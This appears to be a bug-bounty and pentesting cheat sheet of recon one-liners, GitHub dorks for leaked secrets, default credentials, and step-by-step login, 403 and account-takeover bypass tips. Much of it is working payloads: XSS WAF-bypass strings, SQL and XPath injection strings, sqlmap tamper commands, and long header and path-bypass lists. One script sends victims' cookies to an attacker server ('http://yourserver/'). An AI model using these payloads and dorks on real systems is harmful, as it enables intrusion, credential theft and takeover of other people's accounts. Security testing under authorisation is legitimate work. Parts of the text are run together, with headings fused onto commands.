cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0Screenshots using Nuclei
nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -vSQLmap Tamper Scripts - WAF bypass
sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agentShodan Cli
shodan search Ssl.cert.subject.CN:"target.com" --fields ip_str | anew ips.txtFfuf.json to only ffuf-url.txt
cat ffuf.json | jq | grep "url" | sed 's/"//g' | sed 's/url://g' | sed 's/^ *//' | sed 's/,//g'Update golang
curl https://raw.githubusercontent.com/udhos/update-golang/master/update-golang.sh | sudo bashCensys CLI
censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'Nmap cidr to ips.txt
cat cidr.txt | xargs -I @ sh -c 'nmap -v -sn @ | egrep -v "host down" | grep "Nmap scan report for" | sed 's/Nmap scan report for //g' | anew nmap-ips.txt'Xray urls scan
for i in $(cat subs.txt); do ./xray_linux_amd64 ws --basic-crawler $i --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +"%T").html ; donegrep only nuclei info
result=$(sed -n 's/^\([^ ]*\) \([^ ]*\) \([^ ]*\) \([^ ]*\).*/\1 \2 \3 \4/p' file.txt)
echo "$result"[sqli-error-based:oracle] [http] [critical] https://test.com/en/events/e5?utm_source=test'&utm_medium=FUZZ'
Download js files
## curl
mkdir -p js_files; while IFS= read -r url || [ -n "$url" ]; do filename=$(basename "$url"); echo "Downloading $filename JS..."; curl -sSL "$url" -o "downloaded_js_files/$filename"; done < "$1"; echo "Download complete."
## wget
sed -i 's/\r//' js.txt && for i in $(cat js.txt); do wget "$i"; doneFilter only html/xml content-types for xss
cat urls.txt | httpx -ct -silent -mc 200 -nc | grep -i -E "text/html|text/xml" | cut -d '[' -f 1 | anew xml_html.txt
## using curl
while read -r url; do
if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \
curl -s -I "$url" | grep -iq 'Content-Type:.*text/\(html\|xml\)'; then
echo "$url"
fi
done < urls.txt > xml_html.txtGet favicon hash
curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jqBuild wordlists from a nuclei templates
for i in `grep -R yaml | awk -F: '{print $1}'`; do cat $i | grep 'BaseURL}}/' | awk -F '{{BaseURL}}' '{print $2}' | sed 's/"//g' | sed "s/'//g"; doneDorks
How to use Google Dorks
Scope Restriction/Filtering
Command
Description
Example
site:
Restricts search to a specific website.
site:yahoo.com
filetype:
Only returns searches that match the stated file type. Must be searched with a query.[1]
dogs filetype:pdf
@
Restricts search to a particular social media site.
@youtube
Information
Command
Description
Example
define:
Defines the provided word or phrase.
define:arbitrary
stocks:
Returns the financial activity of the provided stock.
stocks:netflix
movie:
Gives info about the provided movie.
movie:aladdin
source:
Finds reports from the provided Google News source.
source:cnn.com
$
Searches for a price of an item in USD.
ipad $500
map:
Returns a map of the provided location.
map:new york city
weather:
Returns the current weather of the provided location.
weather:london
Links
Command
Description
Example
cache:
Returns a link to Google's last cache of the provided website.
cache:yahoo.com
link:
Returns pages that link to the provided domain.
link:cnn.com
related:
Returns websites that are related to the provided website.
related:google.com
Text Commands
Command
Description
Example
intitle:
Returns websites that have the first keyword in the title, and the other keywords somewhere else on the page (including in the title).
intitle: stereo speakers
allintitle:
Returns websites that have all the keywords in the title.
allintitle: stereo speakers
inurl:
Returns websites that have the first keyword in the URL, and the other keywords somewhere else on the page (including in the URL).
inurl: dog behavior
allinurl:
Returns websites that have all the keywords in the URL.
allinurl: dog behavior
Operators
Command
Description
Example
" "
Put around your search query to search the entire thing.
"car dealership"
OR, |
Put between queries to look for one and/or the other.
iPhone OR Google Pixel
( )
Group queries into logical groups.
(dogs OR cats) behavior
-
Place in front of a query to remove it from the search page.
restaurants near me -pizza
*
Wildcard placeholder.
Windows error code *
..
Place between numbers to search the range (inclusive of the numbers in the query).
Warped Tour 2000..2005
AROUND( )
Returns pages that have the provided number of words around the search query.
buy AROUND(2) cars
Math
Command
Description
Example
+
Adds two numbers.
10 + 20
-
Subtract two numbers.
10 - 20
*
Multiplies two numbers.
10 * 20
/
Divides two numbers.
10 / 20
% of
Finds the percentage of a number.
10% of 20
^, **
Raise the first number to the power of the second number.
10^20, 10**20
in, to
Convert a quantity or word to another unit or language.
6 ft to cm, hello in French
sqrt( )
Find the square root of a number.
sqrt(25)
i
Placeholder for an imaginary number. Use with other math functions.
i * 20
choose
Put between two numbers to perform combinatorics.
10 choose 20
sin, cos, tan
Trigonometric functions.
sin 20 degrees
timer
Sets a timer for the provided time.
timer 10 minutes
graph
Graphs the provided equation.
graph log(x)
How to Use Google Dorks
[
Step 1 Simply add one or more dorks to your search query. ](https://www.wikihow.com/Google-Dorking-Commands#/Image:14709789-3.jpg)
**Simply add one or more dorks to your search query.**Your query and each dork should be separated by a space.
For example, if you wanted to search for something on Facebook, you can filter out search results from all other sites by writing [query here] site:facebook.com.
[
Step 2 You can search (most) commands without a query. ](https://www.wikihow.com/Google-Dorking-Commands#/Image:14709789-4.jpg)
**You can search (most) commands without a query.**This is especially useful for commands like define:. Some commands, however, like filetype: must be searched with a query.
For example, if you wanted to define the word "sanctimonious," you would search define:sanctimonious.
#Github Dorks sensitive info finding queries
1."API_KEY" OR "api_key" or "API_SECRET" OR "api_secret" tesla
2."DB_PASSWORD" OR "DATABASE_URL" OR "DATABASE_PASSWORD" tesla
3."aws_access_key_id" OR "aws_secret_access_key" tesla
4.filename:.env tesla
5."password" OR "secret" OR "credential" tesla
6."-----BEGIN OPENSSH PRIVATE KEY-----" tesla
7."confidential" OR "sensitive" tesla
8."error" OR "exception" tesla
9."password" OR "secret" OR "credential" tesla in:file branch:*
tesla extension:json OR extension:yml OR extension:xml OR extension:config
11."-----BEGIN CERTIFICATE-----" tesla
12."-----BEGIN PRIVATE KEY-----" tesla
13."token" OR "access_token" tesla
filename:config tesla
filename:settings tesla
"fatal OR "exception" OR "error" tesla
//tesla OR /* tesla
"webhook" tesla
tesla language:python
tesla language:javascript
secrets. tesla
Nuclei recon
STEP 1 : Using Dynamic Application Security Testing (DAST) , and Headless
--->
nuclei -l targets.txt -severity high,critical,medium -t /home/rohit/.local/nuclei-templates/ -dast -headlessSTEP 2 : Targeting Specific Vulnerabilities (XSS, SQLi):
--->
nuclei -l targets.txt -severity high,critical,medium -tags xss,sqli -t /home/rohit/.local/nuclei-templates/ -dast
STEP 3 : P1, P2, P3 Vulnerabilities:
--->
nuclei -l targets.txt -severity high,critical,medium -tags p1,p2,p3 -t /home/rohit/.local/nuclei-templates/ -dastSTEP 4: Combined Command for Maximum Coverage
--->
nuclei -l targets.txt -severity high,critical,medium -tags xss,sqli,p1,p2,p3 -t /home/rohit/.local/nuclei-templates/ -dast -headlessSTEP 5: The Ultimate Nuclei Command
--->
nuclei -l targets.txt -t /home/rohit/.local/nuclei-templates/ -severity high,critical,medium -tags cve,http,vulnerabilities,generic,xss,sqli,lfi,openredirect,cors,p1,p2,p3 -dast -headless -silent -rate-limit 150 -o output.txt
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50cat or.txt | nuclei -t /home/rohit/recon/payloads/custom_nuclei/openRedirect.yaml --retries 2
cat or.txt | nuclei -t /home/niuclei-templates/blind-ssrf.yaml --retries 2 -dast
cat or.txt | nuclei -t /home/niuclei-templates/response-ssrf.yaml --retries 2 -dast
cat or.txt | nuclei -t /home/niuclei-templates/credential-disclosure-all.yaml
cat or.txt | nuclei -t /home/niuclei-templates/x-forwarded.yaml cat crlf.txt | nuclei -t /home/rohit/recon/payloads/custom_nuclei/cRlf.yamlcat sql.txt | nuclei -t /home/niuclei-templates/errsqli.yaml -dast
cat sql.txt | nuclei -t /home/niuclei-templates/timeqli.yaml -dastcat iis.txt | nuclei -t /home/niuclei-templates/iis.yaml --> next --> shortscan url -Fcat git.txt | nuclei -t /home/niuclei-templates/gitexposed.yaml cat cors.txt | nuclei -t /home/niuclei-templates/cors.yaml [ ] Tip 1
Here’s my last finding (P1)
1- register account
2- intercept request
3- here’s the response in image so in “role” parameter we have ROLE_USER
So i don’t know what i can replace it to privilege my account to admin
4- open source code and look in js files
5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role”
6- so i use match and replace to replace value’s
7- boom privilege my account to admin account with full control[ ] Tip 2
اسعد الله ايامكم بكل خير
هذا ثغرة في شركة مايكروسوفت
كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS
Exploit:
https//anywebsite.com/c:/Windows/Win.ini[ ] Tip 3
CloudFront bypass:⚔️
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
Would be interested to know if this is target specific or other CloudFront websites are vulnerable[ ] Tip 4
1 : Get all the URL from wayback / Gau
2 : Filter out the js file using httpx
3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension[ ] Tip 5
target.com/wp-config.php => 404 not found
target.com/wp-config.php.… ==> 200 ok and downloaded
wp-config.php.swp ==>>200 ok
after that if its contain encoded using hexadecimal decode it .[ ] Tip 6
try testing for SQLi Authentication Bypass :⚔️
username:'--'/"--"
password:'--'/"--"[ ] Tip 7
default credentials:
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle:"Oracle+PeopleSoft+Sign-in"
Wrote a nuclei template to test all permutations[ ] Tip 8
nmap -sV -iL host.txt -oN nmap_scan.txt
Wait a few hours
cat nmap_scan.txt | grep open[ ] Tip 9
https://youtu.be/VsM6ERUx_AA
------------------------------------------
------------------------------------------
Xss payload
https://github.com/Aacle/xss_payload
------------------------------------------
------------------------------------------
Use Nuclei for leaked api.
$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
------------------------------------------
------------------------------------------
#Scan through #TOR
sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5
------------------------------------------
------------------------------------------
Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token,
and check access to each repo of main organization
------------------------------------------
------------------------------------------
bypass alert ==> [alert][0].call(this,1)
------------------------------------------
------------------------------------------[ ] Tip 10
1_ Go to SHODAN and get the IP
2 _ Go to Dirsearch and do a Fuzzing
3_ Obtaining sensitive data[ ] Tip 11
Recon Recon Recon!!
Shodan Dorking Always wins.
ssl:"Company Inc"
Filter results by http title.
Start fuzzing an interesting asset.
Found swagger-ui/
Tried swagger ui xss with
https://github.com/seanmarpo/webjars-swagger-xss[ ] Tip 12
Have you ever heard about wc-db file disclosure?!
> you can check it by:
https://target[.]com/.svn/wc.db
> then you can use this tool to dump all of the website source code
https://github.com/anantshri/svn-extractor[ ] Tip 13
1. Shodan Dork -> Some Assets.
2. Fuzzing & got 403 Forbidden on /config dir.
3. Fuzzing on /config/FUZZ and getting some config files.
4. Same pattern and it works on another asset.[ ] Tip 14
Default Credentials admin:admin
- shodan dork :
- ssl:"target[.]com" 200 http.title:"dashboard"
[ ] Tip 15
A quick thread about JIRA misconfiguration that I tried today.
3. Google dorks to find jira dashboards.
inurl:/ConfigurePortalPages!default.jspa?view=popular4. Google dork to find jira filters page.
inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )[ ] Tip 16
5. Google dork to find the exposed user list.
inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log[ ] Tip 17
GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information
dork: "org:company extension:csv admin"
leak: "cc number, cvv, email, phone number"[ ] Tip 18 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:
cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403[ ] Tip 19
Tip : "GET request for XML not found" changes the request to POST with XXE payload[ ] Tip 20 Extract Juicy Info From AlienVault
for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done[ ] Tip 21 bypass PHPMYADMIN
phpmyadmin =>301
PHPmyadmin =>200
PHPMYadmin =>200
PHPMYADMIN =>200
phpMYadmin =>200
phpmyAdmin =>200[ ] Tip 22 SVN
1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/
3. clone & use https://github.com/anantshri/svn-extractor
4. ./svn-extractor.py --url http://url.com --match database.php
5. result in output dir and just open it[ ] Tip 23 xss
in :
firstname:<img src=x
middlename:onerror
lastname:=alert(domain)/>
==========================
1:- Use https://github.com/Leoid/MatchandReplace
2:- Import to burpsuite match and replace.
3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
4:- The Blind xss payload will added automatically by burp and gospider.
Finally:- 4 BLIND XSS REPORTS.
[ ] Tip 24 Cookie Bomb
URL that causes the cookie length to exceed request header limits for all requests until the cookie expires.
1. Find a Cookie set by a parameter
2. Inject as many commas as you can into the parameter until you DoS that user[ ] Tip 25 xss via jwt
1. Make a jwt token and insert a xss paylaod.
2. The final url is like url/dest?jwt=vulnerable-jwt-token.
(jwt= paramter was decoding the provided jwt token and show's it into the page).[ ] Tip 26 Getting Private Information URLs by curling
1. Grab all URLs from your target which you think hard to hunt or test or static
2. Save all files in any.txt
3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done
4. All curled response grep for following
Keywords:
drive. google
docs. google
/spreadsheets/d/
/document/d/
NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later
You will get URLs includes juicy information[ ] Tip 26 Injecting Payload In Phone Numbers field
https://twitter.com/Pwn2arn/status/1609146484263641089[ ] Tip 27 Easy P1 upside_down_face
1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
3: Now check manually sensitive keyword js file[ ] Tip 28 Tips for my last P1 :
1 - Found dev portal for developing require Basic Auth
2 - search in GitHub "domain" docker
3- found a user try to pull the privite repository and passing the username:pass
4 - Decode Base64 Basic Auth
5 - Logged in and full access on all Prod
[ ] Tip 29 Github leak for Aws,jira,okta etc
1. Org:"target" pwd/pass/passwd/password
2. "target. atlassian" pwd/pass/passwd/password
3. "target. okta" pwd/pass/passwd/password
4. "Jira. target" pwd/pass/passwd/password[ ] Tip 30 soucremap js
https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap
[ ] Tip 31 if a site uses AngularJS,
test {{7*7}} to see whether 49 is rendered anywhere.
If the application is built with ASP.NET with XSS protection
enabled, you might want to focus on testing other vulnerability
types first and check for XSS as a last resort.
AngularJS Client-Side Template Injection
https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE
[ ] Tip 32 If a site is built with Rails,
you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the
RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern
www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing
insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook.
[ ] Tips 1
XSS WAF Bypass using location concatenation:
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">[ ] Tips 2
[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay
Hunting for JSON GET Servlet on /content.1.json however result = 404?
Try this:
/conten/.1.json
/conten/t.1.json
/content.tidy.1.json
/conten/.tidy.infinity.json[ ] Tips 3
Try these file-uploading extensions accordingly.
ASP Applications:
.asa -> potential remote code execution
.asax -> potential remote code execution
.asp -> potential remote code execution
.aspx -> potential remote code execution
Java Applications:
.jsp -> potential remote code execution
.jspx -> potential remote code execution
Perl Applications:
.pl -> potential remote code execution
Python Applications:
.py -> potential remote code execution
Ruby Applications:
.rb -> potential remote code execution
Other files that should be restricted for most applications:
.bat
.cgi
.exe
.htm -> potential XSS
.html -> potential XSS
.jar
.rar
.shtml
.svg -> potential XSS
.swf -> potential XSS
.tar
.zip
.cer -> potential XSS
.hxt -> potential XSS
.stm -> potential XSS[ ] Tips 4
For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎
#bugbountytips #bugbountytip
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
sleep payload
[1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s
For who asking about sqlmap command in this case
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"[ ] Tips 5
target[.]com/phpmyadmin/setup/index.php
==> 301 to login page
target[.]com/phpMyAdmin/setup/index.php
==> 200 to phpmyadmin setup
phpmyadmin 301
phpMyAdmin 200[ ] Tips 6
1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/
3. clone & use https://github.com/anantshri/svn-extractor
4. ./svn-extractor.py --url http://url.com --match database.php
5. result in output dir and just open it
credit:@faizalabroni
[ ] Tips 7
SQLi via parameter name injection.
Payload:
someparam[id) VALUES (NULL); WAITFOR DELAY '0:0:5';--]=testvulnerability-Checklist
#403-bypass
https://github.com/iamj0ker/bypass-403
https://github.com/channyein1337/403-bypass/blob/main/403-bypass.py
https://github.com/nico989/B1pass3r
https://github.com/Dheerajmadhukar/4-ZERO-3[ ] bypass by fuzz or brute force
you can use dirsearch tool or discovery content path [ ] bypass by waybachurl
search in wayback about this subdomain you can find any important path [ ] bypass by header names
Base-Url
Client-IP
Http-Url
Proxy-Host
Proxy-Url
Real-Ip
Redirect
Referer
Referrer
Refferer
Request-Uri
Uri
Url
X-Client-IP
X-Custom-IP-Authorization
X-Forward-For
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Scheme
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded
X-Forwarder-For
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Original-Remote-Addr
X-Original-Url
X-Originating-IP
X-Proxy-Url
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Rewrite-Url
X-True-IP[ ] bypass by header payloads
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1[ ] bypass by url payloads
#
#?
%09
%09%3b
%09..
%09;
%20
%23
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f/
%2f;?
%2f?;
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3f%23
%3f%3f
%3f.php
..
..%00/
..%00/;
..%00;/
..%09
..%0d/
..%0d/;
..%0d;/
..%5c/
..%ff/
..%ff/;
..%ff;/
../
..;%00/
..;%0d/
..;%ff/
..;\
..;\;
..\
..\;
.html
.json
/
/#
/%20
/%20#
/%20%23
/%23
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252e/
/%252f
/%2e%2e
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2e/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2e/
/%2e//
/%2f
/%3b/
/..
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/./
/.//
/.;/
/.;//
//
//..
//../../
//..;
//./
//.;/
///..
///../
///..//
///..;
///..;/
///..;//
//;/
/;/
/;//
/;?
/;x
/;x/
/?
/?;
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
;
;%09
;%09..
;%09..;
;%09;
;%2F..
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e%2e/
;/%2e.
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/../
;/../%2f/
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//%2e%2e/
;/..//%2f
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//%2f../
;//..
;//../../
;///..
;///../
;///..//
;?
;x
;x/
;x;
?
?#
?.php
?;
??
///
/%2f/
//%2f
%2f/%2f
%2f%2f%2f
%2f//##Acount takeover
[ ] a lot of ideas in this article by omar hashem
https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5[ ] OAuth to Account takeover
https://book.hacktricks.xyz/pentesting-web/oauth-to-account-takeover[ ] Pre-Account Takeover
A pre-account takeover occurs when an attacker creates a user account using one signup method and the victim creates another account using a different signup method using the same email address. Because the email addresses are the same, the application connects the two accounts. when the app is unable to validate email addresses.
How to hunt :-
Try registering any email address without verifying it.
Try registering an account again, but this time with a different method, such as ‘sign up with Google’ from same email address.
Due to the fact that both email addresses are the same, the web application will link the two accounts.
Now try logging in using the specified password and username. Check to see whether you can see information from that account that was retrieved via Google.[ ] Account takeover due to Improper Rate limit
How to Hunt:-
capture the request at the login page, while providing username and password.
send it to intruder and Brute force it.
Analyze the response and length.[ ] Account takeover by utilizing sensitive data exposure
Sensitive data exposure occurs when a web application failed to properly protect confidential information, resulting in the disclosure of sensitive information or data about users, or anything related to them, to a third party.
Occasionally, the application displays unnecessary data, such as valid OTPs, hashes, or passwords, over the request and response parts. So it’s a good idea to pay attention to the response and request portions.[ ] login
1. check if you are able to brute force the password
2. Test for OAuth misconfigurations
3. check if you are able to bruteforce the login OTP
4. check for JWT mesconfigurations
5. Test for SQL injection to bypass authentication ```admin" or 1=1;--```
6. check if the application validates the OTP or Token[ ] password reset
1. check if you are able to brute force the password reset OTP
2. test for token predectability
3. test for JWT misconfigurations
4. check if the password reset endpoint is vulnerable to IDOR
5. check if the password reset endpoint is vulnerable to Host Header injection
6. check if the password reset endpoint is leaking the token or OTP in the HTTP response
7. check if the application validates the OTP or Token
8. test for HTTP parameter Pollution (HPP)
[ ] XSS to Account Takeover
if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
1. try to exfiltrate the cookies
2. try to exfiltrate the Auth Token
3. if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies
- PoC Example:
```html
<script>
/*
this script will create a hidden <img> element
when the browser tries to load the image
the victim's cookies will be sent to your server
*/
var new_img = document.createElement('img');
new_img.src = "http://yourserver/" + document.cookie;
new_img.style = 'display: none;'
document.body.appendChild(new_img);
</script>
```[ ] CSRF to Account Takeover
1. check if the email update endpoint is vulnerable to CSRF
2. check if the password change endpoint is vulnerable to CSRF[ ] IDOR to Account Takerover
1. checck if the email update endpoint is vulnerable to IDOR
2. check if the password change endpoint is vulnerable to IDOR
3. check if the password reset endpoint vulnerable to IDOR[ ] Account takeover by Response & Status code Manipulation
[ ] Account takeover by exploiting Weak cryptography
check this
https://infosecwriteups.com/weak-cryptography-in-password-reset-to-full-account-takeover-fc61c75b36b9[ ] Password or email change function
IF you try to change password and see email parameter in password change request, Try changing your email to victim email[ ] Sing-Up Function
IF you try to sing-up new account in target site, in email filed try set target email
IF you try to sing-up new account in target site using 3rd party, in 3d party use phone number instead email then link 3rd account with target site.Then Go setting try link victim email in you account[ ] Rest Token
Try to use your REST Token with Target account. Hint: email=Target@email.com&code=$Attacker_TOKEN$
Brute Force Rest Token if it is numeric. Hint : email=Target@email.com&code=$TOKEN$
Try to figure out how the token are generated: 1. Generated based on TimeStamp OR ID of user OR email of user[ ] Host Header Injection
when send rest account request intercept POST Request and Change Host header value from target.site TO Attacker.com: Hint POST /PassRest HTTP1/1 Host: Attacker.com[ ] CORS Misconfiguration to Account Takeover
If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose:
https://book.hacktricks.xyz/pentesting-web/cors-bypass[ ] Account takeover via leaked session cookie
https://hackerone.com/reports/745324[ ] HTTP Request Smuggling to ATO
https://hackerone.com/reports/737140
https://hackerone.com/reports/740037[ ] Bypassing Digits origin validation which leads to account takeover
https://hackerone.com/reports/129873[ ] Top ATO report in hackerone
https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.mdAdmin Panels
[ ] defualt credentials defualt credentials
admin:admin
admin:password
author:author
administrator:password
admin123:password
username:pass12345
and many of defualt credentials[ ] Bypass by SQL Injection
inject username or paswword with a lot of payloads:
=> error based
=> time based[ ] By Cross Site Scripting(XSS)
inject username or password with xss payloads:
=> url encode
=> base64 encode [ ] By Manipulating the Response
change the status of response from
200 => 302
failed => success
error => success
403 => 200
403 => 302
false => true[ ] Bypass by Brute Force Attack
https://medium.com/@uttamgupta_/1-how-to-perform-login-brute-force-using-burp-suite-9d06b67fb53d
https://medium.com/@uttamgupta_/broken-brute-force-protection-ip-block-aae835895a74[ ] Bypass by Directory Fuzzing Attack
use this list to fuzz
https://github.com/six2dez/OneListForAll[ ] By Removing Parameter in Request
When you enter wrong credentials the site shows error like username and password is incorrect/does not match,
password is incorrect for this username etc,
this type of response is shown by the site so can try this method Huh.
First you intercept the request and remove the password parameter in the request and forward the request.
Then the server sees that the username is available and logs you in to the site.
This problem occurs when the server does not analyze the request properly[ ] check js file in login page
it can contain a important path or username and password[ ] Check for comments inside the page
it can contain a important info such as username and password[ ] Check the PHP comparisons error:
user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b[ ] Change content type to json and send json values (bool true included)
If you get a response saying that POST is not supported you can try to send the JSON in the body but with a GET request with Content-Type: application/json[ ] Check nodejs potential parsing error
1. Nodejs will transform that payload to a query similar to the following one: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; which makes the password bit to be always true.
2. If you can send a JSON object you can send "password":{"password": 1} to bypass the login.
3. Remember that to bypass this login you still need to know and send a valid username.
4. Adding "stringifyObjects":true option when calling mysql.createConnection will eventually block all unexpected behaviours when Object is passed in the parameter.[ ] No SQL Injection
https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass[ ] XPath Injection
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
